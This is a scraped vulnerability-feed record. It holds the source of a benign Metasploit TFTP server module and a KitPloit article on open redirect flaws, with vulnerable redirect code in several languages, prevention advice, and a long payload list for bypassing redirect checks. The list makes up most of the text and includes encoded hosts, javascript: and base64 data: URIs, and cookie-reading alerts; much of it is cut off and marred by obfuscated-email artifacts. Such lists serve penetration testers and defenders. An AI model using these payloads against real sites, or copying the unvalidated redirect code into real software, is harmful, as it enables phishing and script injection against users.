"talosblog", "idList": ["TALOSBLOG:9ADEDDC1CD8F85638779D7AE60E23719"]}, {"type": "mskb", "idList": ["KB2986475", "KB2961522", "KB2936871", "KB2905616", "KB2866475", "KB4524149", "KB4520004"]}, {"type": "talos", "idList": ["TALOS-2019-0940", "TALOS-2019-0941"]}, {"type": "exploitdb", "idList": ["EDB-ID:47562", "EDB-ID:47561"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2408-1"]}, {"type": "cve", "idList": ["CVE-2018-18931", "CVE-2019-15683"]}], "modified": "2019-10-30T14:36:53"}, "vulnersScore": 3.2}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}
{"kitploit": [{"lastseen": "2019-12-07T19:35:54", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-doCKQ-FPiBE/XemX3eOZxDI/AAAAAAAARB8/QE7D_49w8W8RfG8exZPZ23vuDNsm-FXUQCNcBGAsYHQ/s1600/open-redirection-vulnerability.png>)\n\n \nUnvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a [ phishing ](<https://www.kitploit.com/search/label/Phishing> \"phishing\" ) scam and steal user credentials. \nBecause the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application\u2019s access control check and then forward the attacker to privileged functions that they would normally not be able to access. \n \n** Java : ** \n\n \n \n response.sendRedirect(\"http://www.mysite.com\"); \n\n \n** PHP : ** \n\n \n \n <?php\n /* Redirect browser */\n header(\"Location: http://www.mysite.com\");\n ?>\n\n \n** ASP .NET : ** \n\n \n \n Response.Redirect(\"~/folder/Login.aspx\")\n\n \n** Rails : ** \n\n \n \n redirect_to login_path\n\nIn the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker. \n \n** Dangerous URL Redirects ** \nThe following examples demonstrate unsafe redirect and forward code. \n \n** Dangerous URL Redirect Example 1 ** \nThe following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL: \n\n \n \n response.sendRedirect(request.getParameter(\"url\"));\n\nThe following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL: \n\n \n \n $redirect_url = $_GET['url'];\n header(\"Location: \" . $redirect_url);\n\nA similar example of C# .NET [ Vulnerable ](<https://www.kitploit.com/search/label/Vulnerable> \"Vulnerable\" ) Code: \n\n \n \n string url = request.QueryString[\"url\"];\n Response.Redirect(url);\n\nAnd in Rails: \n\n \n \n redirect_to params[:url]\n\nThe above code is vulnerable to an attack if no validation or extra method controls are applied to verify the certainty of the URL. This [ vulnerability ](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) could be used as part of a phishing scam by redirecting users to a malicious site. \nIf no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example: \n\n \n \n http://example.com/example.php?url=http://malicious.example.com\n\nThe user sees the link directing to the original trusted site ( ` example.com ` ) and does not realize the redirection that could take place \n \n** Dangerous URL Redirect Example 2 ** \nASP .NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. In order to avoid this vulnerability, you need to apply MVC 3. \nThe code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is being performed against the returnUrl parameter. \nASP.NET MVC 2 LogOn action in ` AccountController.cs ` (see [ Microsoft ](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Docs link provided above for the context): \n\n \n \n [HttpPost]\n public ActionResult LogOn(LogOnModel model, string returnUrl)\n {\n if (ModelState.IsValid)\n {\n if (MembershipService.ValidateUser(model.UserName, model.Password))\n {\n FormsService.SignIn(model.UserName, model.RememberMe);\n if (!String.IsNullOrEmpty(returnUrl))\n {\n return Redirect(returnUrl);\n }\n else\n {\n return RedirectToAction(\"Index\", \"Home\");\n }\n }\n else\n {\n ModelState.AddModelError(\"\", \"The user name or password provided is incorrect.\");\n }\n }\n \n // If we got this far, something failed, redisplay form\n return View(model);\n }\n\n \n** Preventing Unvalidated Redirects and Forwards ** \nSafe use of redirects and forwards can be done in a number of ways: \n\n\n * Simply avoid using redirects and forwards. \n * If used, do not allow the url as user input for the destination. This can usually be done. In this case, you should have a method to validate URL. \n * If user input can\u2019t be avoided, ensure that the supplied value is valid, appropriate for the application, and is authorized for the user. \n * It is recommended that any such destination input be mapped to a value, rather than the actual URL or portion of the URL, and that server side code translate this value to the target URL. \n * Sanitize input by creating a list of trusted URL's (lists of hosts or a regex). \n * Force all redirects to first go through a page notifying users that they are going off of your site, and have them click a link to confirm. \n \n** Open Redirect [ Payload List ](<https://www.kitploit.com/search/label/Payload%20List> \"Payload List\" ) : ** \n\n \n \n /%09/example.com\n /%2f%2fexample.com\n /%2f%2f%2fbing.com%2f%3fwww.omise.co\n /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/\n /%5cexample.com\n /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d\n /.example.com\n //%09/example.com\n //%5cexample.com\n ///%09/example.com\n ///%5cexample.com\n ////%09/example.com\n ////%5cexample.com\n /////example.com\n /////example.com/\n ////\\;@example.com\n ////example.com/\n ////example.com/%2e%2e\n ////example.com/%2e%2e%2f\n ////example.com/%2f%2e%2e\n ////example.com/%2f..\n ////example.com//\n ///\\;@example.com\n ///example.com\n ///example.com/\n //google.com/%2f..\n //[email\u00a0protected]/%2f..\n ///google.com/%2f..\n ///[email\u00a0protected]/%2f..\n ////google.com/%2f..\n ////[email\u00a0protected]/%2f..\n https://google.com/%2f..\n https://[email\u00a0protected]/%2f..\n /https://google.com/%2f..\n /https: //[email\u00a0protected]/%2f..\n //www.google.com/%2f%2e%2e\n //[email\u00a0protected]/%2f%2e%2e\n ///www.google.com/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////www.google.com/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https://www.google.com/%2f%2e%2e\n https://[email\u00a0protected]/%2f%2e%2e\n /https://www.google.com/%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n //google.com/\n //[email\u00a0protected]/\n ///google.com/\n ///[email\u00a0protected]/\n ////google.com/\n ////[email\u00a0protected]/\n https://google.com/\n https://[email\u00a0protected]/\n /https://google.com/\n /https://[email\u00a0protected]/\n //google.com//\n //[email\u00a0protected]//\n ///google.com//\n ///[email\u00a0protected]//\n //// google.com//\n ////[email\u00a0protected]//\n https://google.com//\n https://[email\u00a0protected]//\n //https://google.com//\n //https://[email\u00a0protected]//\n //www.google.com/%2e%2e%2f\n //[email\u00a0protected]/%2e%2e%2f\n ///www.google.com/%2e%2e%2f\n ///[email\u00a0protected]/%2e%2e%2f\n ////www.google.com/%2e%2e%2f\n ////[email\u00a0protected]/%2e%2e%2f\n https://www.google.com/%2e%2e%2f\n https://[email\u00a0protected]/%2e%2e%2f\n //https://www.google.com/%2e%2e%2f\n //https://[email\u00a0protected]/%2e%2e%2f\n ///www.google.com/%2e%2e\n ///[email\u00a0protected]/%2e%2e\n ////www.google.com/%2e%2e\n ////[email\u00a0protected]/%2e%2e\n https:///www.google.com/%2e%2e\n https:///[email\u00a0protected]/%2e%2e\n //https:///www.google.com/%2e%2e\n //[email\u00a0protected]:///www.google.com/%2e%2e\n /https://www.google.com/%2e%2e\n /https://[email\u00a0protected]/%2e%2e\n ///www.google.com/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////www.google.com/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https:///www.google.com/%2f%2e%2e\n https:///[email\u00a0protected]/%2f%2e%2e\n /https://www.google.com/%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n /https:///www.google.com/%2f%2e%2e\n /https:///[email\u00a0protected]/%2f%2e%2e\n /%09/google.com\n /%09/[email\u00a0protected]com\n //%09/google.com\n //%09/[email\u00a0protected]\n ///%09/google.com\n ///%09/[email\u00a0protected]\n ////%09/google.com\n ////%09/[email\u00a0protected]\n https://%09/google.com\n https://%09/[email\u00a0protected] com\n /%5cgoogle.com\n /%[email\u00a0protected]\n //%5cgoogle.com\n //%[email\u00a0protected]\n ///%5cgoogle.com\n ///%[email\u00a0protected]\n ////%5cgoogle.com\n ////%[email\u00a0protected]\n https://%5cgoogle.com\n https://%[email\u00a0protected]\n /https://%5cgoogle.com\n /https://%[email\u00a0protected]\n https://google.com\n https://[email\u00a0protected]\n javascript:alert(1);\n javascript:alert(1)\n //javascript:alert(1);\n /javascript:alert(1);\n //javascript:alert(1)\n /javascript:alert(1)\n /%5cjavascript:alert(1);\n /%5cjavascript:alert(1)\n //%5cjavascript:alert(1);\n //%5cjavascript:alert(1)\n /%09/javascript:alert(1);\n /%09/javascript:alert(1)\n java%0d%0ascript%0d%0a:alert(0)\n //google.com\n https:google.com\n //google%E3%80%82com\n \\/\\/google.com/\n /\\/google.com/\n //google.com\n https ://www.whitelisteddomain.tld/https://www.google.com/\n \";alert(0);//\n javascript://www.whitelisteddomain.tld?%a0alert%281%29\n http://0xd8.0x3a.0xd6.0xce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd83ad6ce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://3627734734\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://472.314.470.462\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0330.072.0326.0316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.00072.0000326.000 00316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://[::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http://[::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http://0xd8.072.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd8.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected] 30.3856078\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.0x3a.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http:0xd8.0x3a.0xd6.0xce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd83ad6ce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:3627734734\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:472.314.470.462\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0330.072.0326.0316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\20 [email\u00a0protected]\n http:00330.00072.0000326.00000316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:[::216.58.214.206]\n http:www.[email\u00a0protected][::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http:[::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http:0xd8.072.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd8.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.3856078\n http:[email\u00a0protected]\n http:3H6k7lI [email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.0x3a.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n \u3031google.com\n \u3035google.com\n \u309dgoogle.com\n \u30fcgoogle.com\n \uff70google.com\n /\u3031google.com\n /\u3035google.com\n /\u309dgoogle.com\n /\u30fcgoogle.com\n /\uff70google.com\n %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d\n http://%67%6f%6f%67%6c%65%2e%63%6f%6d\n <>javascript:alert(1);\n <>//google.com\n //google.com\\@www.whitelisteddomain.tld\n https://:@google.com\\@www.whitelisteddomain.tld\n \\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3aalert(1)\n \\u006A\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003aalert(1)\n ja\\nva\\tscript\\r:alert(1)\n \\j\\av\\a\\s\\cr\\i\\pt\\:\\a\\l\\ert\\(1\\)\n \\152\\141\\166\\141\\163\\143\\162\\151\\160\\164\\072alert(1)\n http://google.co m:80#@www.whitelisteddomain.tld/\n http://google.com:[email\u00a0protected]/\n ///example.com/%2e%2e\n ///example.com/%2e%2e%2f\n ///example.com/%2f%2e%2e\n ///example.com/%2f..\n ///example.com//\n //example.com\n //example.com/\n //example.com/%2e%2e\n //example.com/%2e%2e%2f\n //example.com/%2f%2e%2e\n //example.com/%2f..\n //example.com//\n //google.com\n //google%E3%80%82com\n //https:///example.com/%2e%2e\n //https://example.com/%2e%2e%2f\n //https://example.com//\n /<>//example.com\n /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com\n /?url=/\\/example.com&next=/\\/example.com&redirect=/\\/example.com&redirect_uri=/\\/example.com\n /?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com< br/>/\\/\\/example.com/\n /\\/example.com/\n /example.com/%2f%2e%2e\n /http://%67%6f%6f%67%6c%65%2e%63%6f%6d\n /http://example.com\n /http:/example.com\n /https:/%5cexample.com/\n /https://%09/example.com\n /https://%5cexample.com\n /https:///example.com/%2e%2e\n /https:///example.com/%2f%2e%2e\n /https://example.com\n /https://example.com/\n /https://example.com/%2e%2e\n /https://example.com/%2e%2e%2f\n /https://example.com/%2f%2e%2e\n /https://example.com/%2f..\n /https://example.com//\n /https:example.com\n /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com\n /redirect?url=/\\/example.com&next=/\\/example.com&redirect=/\\/example.com&redir=/\\/example.com&rurl=/\\/example.com&redirect_uri=/\\/example.com\n /redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://exampl e.com&rurl=Https://example.com&redirect_uri=Https://example.com\n \n //%2fxgoogle.com\n /ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org\n //localdomain.pw/%2f..\n //[email\u00a0protected]/%2f..\n ///localdomain.pw/%2f..\n ///[email\u00a0protected]/%2f..\n ////localdomain.pw/%2f..\n ////[email\u00a0protected]/%2f..\n https://localdomain.pw/%2f..\n https://[email\u00a0protected]/%2f..\n /https://localdomain.pw/%2f..\n /https://[email\u00a0protected]/%2f..\n //localdomain.pw/%2f%2e%2e\n //[email\u00a0protected]/%2f%2e%2e\n ///localdomain.pw/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////localdomain.pw/%2f%2e%2e\n ////[email\u00a0protected]localdomain.pw/%2f%2e%2e\n https://localdomain.pw/%2f%2e%2e\n https://[email\u00a0protected]/%2f%2e%2e\n /https://localdomain.pw /%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n //localdomain.pw/\n //[email\u00a0protected]/\n ///localdomain.pw/\n ///[email\u00a0protected]/\n ////localdomain.pw/\n ////[email\u00a0protected]/\n https://localdomain.pw/\n https://[email\u00a0protected]/\n /https://localdomain.pw/\n /https://[email\u00a0protected]/\n //localdomain.pw//\n //[email\u00a0protected]//\n ///localdomain.pw//\n ///[email\u00a0protected]//\n ////localdomain.pw//\n ////[email\u00a0protected]//\n https://localdomain.pw//\n https://[email\u00a0protected]//\n //https://localdomain.pw//\n //https://[email\u00a0protected]//\n //localdomain.pw/%2e%2e%2f\n //[email\u00a0protected]/%2e%2e%2f\n ///localdomain.pw/%2e%2e%2f\n ///www.whitelisteddoma [email\u00a0protected]/%2e%2e%2f\n ////localdomain.pw/%2e%2e%2f\n ////[email\u00a0protected]/%2e%2e%2f\n https://localdomain.pw/%2e%2e%2f\n https://[email\u00a0protected]/%2e%2e%2f\n //https://localdomain.pw/%2e%2e%2f\n //https://[email\u00a0protected]/%2e%2e%2f\n ///localdomain.pw/%2e%2e\n ///[email\u00a0protected]/%2e%2e\n ////localdomain.pw/%2e%2e\n ////[email\u00a0protected]/%2e%2e\n https:///localdomain.pw/%2e%2e\n https:///[email\u00a0protected]/%2e%2e\n //https:///localdomain.pw/%2e%2e\n //[email\u00a0protected]:///localdomain.pw/%2e%2e\n /https://localdomain.pw/%2e%2e\n /https://[email\u00a0protected]/%2e%2e\n ///localdomain.pw/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////localdomain.pw/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https:///localdomain. pw/%2f%2e%2e\n https:///[email\u00a0protected]/%2f%2e%2e\n /https://localdomain.pw/%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n /https:///localdomain.pw/%2f%2e%2e\n /https:///[email\u00a0protected]/%2f%2e%2e\n /%09/localdomain.pw\n /%09/[email\u00a0protected]\n //%09/localdomain.pw\n //%09/[email\u00a0protected]\n ///%09/localdomain.pw\n ///%09/[email\u00a0protected]\n ////%09/localdomain.pw\n ////%09/[email\u00a0protected]\n https://%09/localdomain.pw\n https://%09/[email\u00a0protected]\n /%5clocaldomain.pw\n /%[email\u00a0protected]\n //%5clocaldomain.pw\n //%[email\u00a0protected]\n ///%5clocaldomain.pw\n ///%[email\u00a0protected]\n ////%5clocaldomain.pw\n ////%[email\u00a0protected]\n https://%5cloc aldomain.pw\n https://%[email\u00a0protected]\n /https://%5clocaldomain.pw\n /https://%[email\u00a0protected]\n https://localdomain.pw\n https://[email\u00a0protected]\n javascript:alert(1);\n javascript:alert(1)\n //javascript:alert(1);\n /javascript:alert(1);\n //javascript:alert(1)\n /javascript:alert(1)\n /%5cjavascript:alert(1);\n /%5cjavascript:alert(1)\n //%5cjavascript:alert(1);\n //%5cjavascript:alert(1)\n /%09/javascript:alert(1);\n /%09/javascript:alert(1)\n java%0d%0ascript%0d%0a:alert(0)\n //localdomain.pw\n https:localdomain.pw\n //localdomain%E3%80%82pw\n \\/\\/localdomain.pw/\n /\\/localdomain.pw/\n /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/\n //localdomain.pw\n https://www.whitelisteddomain.tld/https://localdomain.pw/\n \";alert(0);//\n javascript://www.whitelisteddomain.tld?%a0alert%281%29\n http://0xd8.0x3a.0xd6.0xce\n http://www.whitelisteddomain.tl [email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd83ad6ce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://3627734734\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://472.314.470.462\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0330.072.0326.0316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.00072.0000326.00000316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http: //[::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http://[::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http://0xd8.072.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd8.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.0x3a.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY&g t;.7d8T\\[email\u00a0protected]\n http:0xd8.0x3a.0xd6.0xce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd83ad6ce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:3627734734\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:472.314.470.462\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0330.072.0326.0316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.00072.0000326.00000316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>. 7d8T\\[email\u00a0protected]\n http:[::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http:[::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http:0xd8.072.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd8.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.0x3a.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY >.7d8T\\[email\u00a0protected]\n \u3031localdomain.pw\n \u3035localdomain.pw\n \u309dlocaldomain.pw\n \u30fclocaldomain.pw\n \uff70localdomain.pw\n /\u3031localdomain.pw\n /\u3035localdomain.pw\n /\u309dlocaldomain.pw\n /\u30fclocaldomain.pw\n /\uff70localdomain.pw\n %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d\n http://%67%6f%6f%67%6c%65%2e%63%6f%6d\n <>javascript:alert(1);\n <>//localdomain.pw\n //localdomain.pw\\@www.whitelisteddomain.tld\n https://:@localdomain.pw\\@www.whitelisteddomain.tld\n \\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3aalert(1)\n \\u006A\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003aalert(1)\n ja\\nva\\tscript\\r:alert(1)\n \\j\\av\\a\\s\\cr\\i\\pt\\:\\a\\l\\ert\\(1\\)\n \\152\\141\\166\\141\\163\\143\\162\\151\\160\\164\\072alert(1)\n http://localdomain.pw:80#@www.whitelisteddomain.tld/\n http://localdomain.pw:[email\u00a0protected]/\n http://3H6k7lIAiqjf[email\u00a0protected] [email\u00a0protected]/\n http://XY>.7d8T\\[email\u00a0protected][email\u00a0protected]/\n http://[email\u00a0protected]@localdomain.pw/\n http://XY>.7d8T\\[email\u00a0protected]@localdomain.pw/\n http://www.whitelisteddomain.tld+&@localdomain.pw#[email\u00a0protected]/\n http://localdomain.pw\\twww.whitelisteddomain.tld/\n //localdomain.pw:80#@www.whitelisteddomain.tld/\n //localdomain.pw:[email\u00a0protected]/\n //[email\u00a0protected][email\u00a0protected]/\n //XY>.7d8T\\[email\u00a0protected][email\u00a0protected]/\n //[email\u00a0protected]@localdomain.pw/\n //XY>.7d8T\\[email\u00a0protected]@localdomain.pw/\n //www.whitelisteddomain.tld+&@localdomain.pw#[email\u00a0protected]/\n //localdomain.pw\\twww.whitelisteddomain.tld/\n //;@localdomain.pw\n http://;@localdomain.pw\n @localdomain.pw\n javascript://https://www.whitelisteddomain.tld/? z=%0Aalert(1)\n data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=\n http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/\n http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/\n http://localdomain.pw%3F.www.whitelisteddomain.tld/\n http://localdomain.pw%23.www.whitelisteddomain.tld/\n http://www.whitelisteddomain.tld:80%40localdomain.pw/\n http://www.whitelisteddomain.tld%2elocaldomain.pw/\n /x:1/:///%01javascript:alert(document.cookie)/\n /https:/%5clocaldomain.pw/\n javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)\n /http://localdomain.pw\n /%2f%2flocaldomain.pw\n /localdomain.pw/%2f%2e%2e\n /http:/localdomain.pw\n /.localdomain.pw\n http://.localdomain.pw\n .localdomain.pw\n ///\\;@localdomain.pw\n ///localdomain.pw\n /////localdomain.pw/\n /////localdomain.pw\n java%0ascript:alert(1)\n java%09script:alert(1)\n java%0dscript:alert(1)\n javascript://%0aalert(1)\n Javas%26%2399;ript:alert(1)\n data: www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>\n jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//\n http://www.localdomain.pw\\.www.whitelisteddomain.tld\n %19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529\n //[email\u00a0protected]/%2f..\n ///google.com/%2f..\n ///[email\u00a0protected]/%2f..\n ////google.com/%2f..\n ////[email\u00a0protected]/%2f..\n https://google.com/%2f..\n https://[email\u00a0protected]/%2f..\n /https://google.com/%2f..\n /https://[email\u00a0protected]/%2f..\n //google.com/%2f%2e%2e\n //[email\u00a0protected]/%2f%2e%2e\n ///google.com/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////google.com/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https://google.com/%2f%2e%2e\n https://[email\u00a0protected]/%2f%2e%2e\n /https://google.com/%2f%2e%2 e\n /https://[email\u00a0protected]/%2f%2e%2e\n //google.com/\n //[email\u00a0protected]/\n ///google.com/\n ///[email\u00a0protected]/\n ////google.com/\n ////[email\u00a0protected]/\n https://google.com/\n https://[email\u00a0protected]/\n /https://google.com/\n /https://[email\u00a0protected]/\n //google.com//\n //[email\u00a0protected]//\n ///google.com//\n ///[email\u00a0protected]//\n ////google.com//\n ////[email\u00a0protected]//\n https://google.com//\n https://[email\u00a0protected]//\n //https://google.com//\n 